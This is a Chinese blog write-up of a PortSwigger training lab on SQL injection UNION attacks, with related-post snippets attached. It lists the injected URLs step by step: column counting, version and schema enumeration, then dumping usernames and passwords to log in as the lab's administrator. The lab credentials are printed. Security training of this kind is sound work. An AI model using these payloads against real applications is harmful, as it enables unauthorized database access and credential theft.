Lab10_ SQL injection UNION attack, retrieving multiple values in a single column

最新推荐文章于 2025-03-13 09:18:35 发布
最新推荐文章于 2025-03-13 09:18:35 发布
阅读量618 收藏 4
点赞数 12
分类专栏: [BurpSuit官方实验室]SQL注入 文章标签: web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53797419/article/details/145524493
版权

文章目录

前言:

实验室标题为:

SQL 注入 UNION 攻击,检索单列中的多个值

等级:执业者

简介:

本实验室包含产品类别过滤器中的 SQL 注入漏洞。查询结果会在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中获取数据。

数据库包含一个名为users的不同表,其中有名为username和password的列。

要解决这个实验室问题,请执行 SQL 注入 UNION 攻击,检索所有用户名和密码,并使用这些信息以管理员用户身份登录。

进入实验室

页面显示为商店页面

构造 payload

尝试闭合

https://xxxxx/filter?category=Gifts' --

单引号+注释符,页面显示正常

and 1=2 判断

https://xxxxx/filter?category=Gifts' and 1=2 --

and 1=1 页面显示正常,and 1=2 页面显示空白,说明页面存在 sql 注入

order by 排序

https://xxxxxx/filter?category=Gifts' order by 2 --

order by 2 页面显示正常,说明有两列数据

union 联合查询

https://xxxx/filter?category=Gifts' and 1=2 union select 1111,'aaaa' --

经过测试,第一个输出点为数字型,第二个输出点为字符串类型

查看数据库的版本

https://xxxxx/filter?category=Gifts' and 1=2 union select null,version() --

获取表名

https://xxxxxx/filter?category=Gifts' and 1=2 union select null,table_name from information_schema.tables --

找到 uses 表

继续获取列名

https://xxxxx/filter?category=Gifts' and 1=2 union select null,column_name from information_schema.columns where table_name='users' --

email

password

username

拿数据,获取账户密码

https://xxxxx/filter?category=Gifts' and 1=2 union select null,username from users --

administrator

carlos

wiener

获取密码

https://xxxxx/filter?category=Gifts' and 1=2 union select null,password from users --

yo9dztrc0mlgbc1xpf5b

ym784ss39x6l1r24p260

6nf7ux1sjj0cwrd3o4iy

登录管理员账户,成功通关

administrator

6nf7ux1sjj0cwrd3o4iy

SQL injection : UNION attacks
Zeker62的博客
08-17 450
当应用程序易受SQL注入攻击并且查询结果在应用程序的响应中返回时,可以使用UNION关键字从数据库中的其他表检索数据。这将导致SQL注入联合攻击。 UNION关键字允许您执行一个或多个附加的SELECT查询,并将结果附加到原始查询。例如: SELECT a, b FROM table1 UNION SELECT c, d FROM table2 此SQL查询将返回一个包含两列的结果集,其中包含table_1中a列和b列以及table_2中c列和d列的值。 要使联合查询正常工作,必须满足两个关键要求:
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6010
BurpSuit官方实验室靶场-SQL注入通关记录。
bp靶场---SQL注入第十关
m0_72471814的博客
01-11 225
看一下描述,已经提供表名跟账号密码的字段名,让直接检索到administrator的账号密码进行登录,但是看标题提示了只有一列可以回显数据。使用order by+数字2,也可以使用category=Gifts' union select null,null--+,这里判断出只有两列。随便点几下,发现url有参数控制,所以测试url有无注入点,直接在后面输入单引号--+,发现回显在标题,所以这里有注入点。第一个位置的时候报错,category=Gifts' union select 'a',null--+
BURP_SQL 靶场
qq_52579508的博客
07-17 533
::info:::点击 view details在6 后面添加一个 ’提示产品ID 无效 那就是不存在 了那就是应该不存在sql注入了 (经过测试的 也不是数字型sql注入 )返回再找一下是否存在其他sql注入点点击蓝色字体 ,可以跳转到其他页面输入一个 单引号就会报五百的服务器错误 ,可能存在sql 注入使用最常用的OR 永恒为真 去测试一下’ or 1=1 –显示是完成了任务 ,证明存在sql注入了。
【送书活动第2期】打靶Portswigger系列—— 一口气通关18个SQL注入靶场详细流程(文末送书)
05-22 1700
BurpSuite自带就有靶场,而BP又是全球最牛的渗透工具之一,是国外专业安全团队长期维护的项目,所以安全学院做得非常不错,里面的靶场(安全实验室Libs)包含了几乎所有常见的Web漏洞,在2024年的今天,我是十分推荐大家去使用的!!
portswigger网站sqli lab答案
12-03 666
burp网站sqli lab答案
(一)SQL注入实例
weixin_43047908的博客
04-09 2245
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
热门推荐
freeking101的博客
07-03 1万+
SQL注入就是将SQL代码插入或添加到 应用或者用户的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器,SQL服务器解析并执行篡改后的sql 并把结果返回。如果管理员没有对参数进行过滤,那么黑客可以通过数据传输点将恶意的SQL语句带入查询。
Portswigger sql注入
arcuied
12-22 1099
这里靶场指出 不要随意的测试 or 1=1 在update 和 delete下可能会增删数据。在union的第二个参数可以注出来 可以分两次读username 和 password。不知道是oracle还是SqlServer还是postgresql的语法。administrator登录 使用的Oracle数据库。需求: administrator登录。需求:获取Oracle数据的数据库版本。还要注意的是Oracle数据库的特性。需求:administrator登录。需求:返回包含null的值。
matlab转换java代码-utl_passing_sas_macro_variables_to_R_and_retrieving_macr
05-26
matlab转换java代码utl_passing_sas_macro_variables_to_R_and_retrieving_macro_variables_from_R 将宏变量传递给R并从R中检索宏变量。关键字:sas sql连接合并大数据分析宏oracle teradata mysql sas社区...
2008_Study on Searching-retrieving Behaviour in Designers' Ideation Process
07-17
- **支持研究工作**:对于像《2008_Study on Searching-retrieving Behaviour in Designers' Ideation Process》这样的研究项目而言,NII 电子图书馆服务能够为其提供必要的文献资料支持,有助于深化对该主题的理解...
Ben Forta - SQL in 10 Minutes a Day, Sams Teach Yourself (2019, Sams Publishing)
01-23
SQL in 10 Minutes a Day, Sams Teach Yourself (2019, Sams Publishing)】这本书是针对想要快速掌握SQL基础知识的读者设计的,它以每天投入10分钟学习的方式,帮助读者逐步理解数据库管理和数据查询的核心概念。...
自学网络安全(黑客技术)2025年 —90天学习计划
2401_85026643的博客
03-10 1570
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
Web安全:保护您的网站免受网络威胁
vvilkim的博客
03-10 1225
在当今数字化时代,Web安全已成为每个网站和应用程序开发者的首要任务。无论是小型博客还是大型电商平台,网络攻击都可能带来灾难性后果。本文将探讨Web安全的重要性,并分享一些关键的最佳实践,帮助您保护网站免受威胁。
Ollama有安全漏洞! 国家网络安全通报中心紧急通报
同学小张的博客
03-04 1792
最新消息!国家网络安全通报中心昨夜发布紧急通告:全球超火的AI神器Ollama惊现重大漏洞!正在用DeepSeek、Llama的你,赶紧自查!
2025年三个月自学手册 网络安全(黑客技术)
2401_85027336的博客
03-11 1107
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
202年充电计划——自学手册 网络安全(黑客技术)
最新发布
2401_85027424的博客
03-13 979
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
Web安全攻防入门教程——hvv行动详解
2401_85029001的博客
03-12 891
Web安全攻防是一个动态变化的领域,攻防技术日新月异。在学习Web安全的过程中,掌握基础的安全理论和常见的攻击类型、漏洞防御技术是最基本的要求。通过不断的学习和实践,你能够提升自己的安全攻防能力,保护Web应用免受各种攻击。
【2025】基于springboot+vue的网络安全科普平台(源码、万字文档、图文修改、调试答疑)
weixin_41915110的博客
03-12 423
随着互联网的普及和信息技术的飞速发展,网络安全问题日益突出,网络诈骗、信息泄露、恶意软件等威胁严重影响了人们的日常生活和财产安全。为了提高公众的网络安全意识和防范能力,开发一个基于 Spring Boot + Vue 的网络安全科普平台具有重要的现实意义。系统为管理员、科普民警和用户提供了丰富的功能,提高了公众的网络安全意识和防范能力,促进了网络安全知识的普及。系统为管理员、科普民警和用户提供了丰富的功能,提高了公众的网络安全意识和防范能力,促进了网络安全知识的普及。
"SQL基础知识和常用查询语句概述
Additionally, the course provides a comprehensive overview of the basic SQL language, including single-table queries. The SQL training course offered by iSoftStone Technologies Ltd. is comprehensive...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值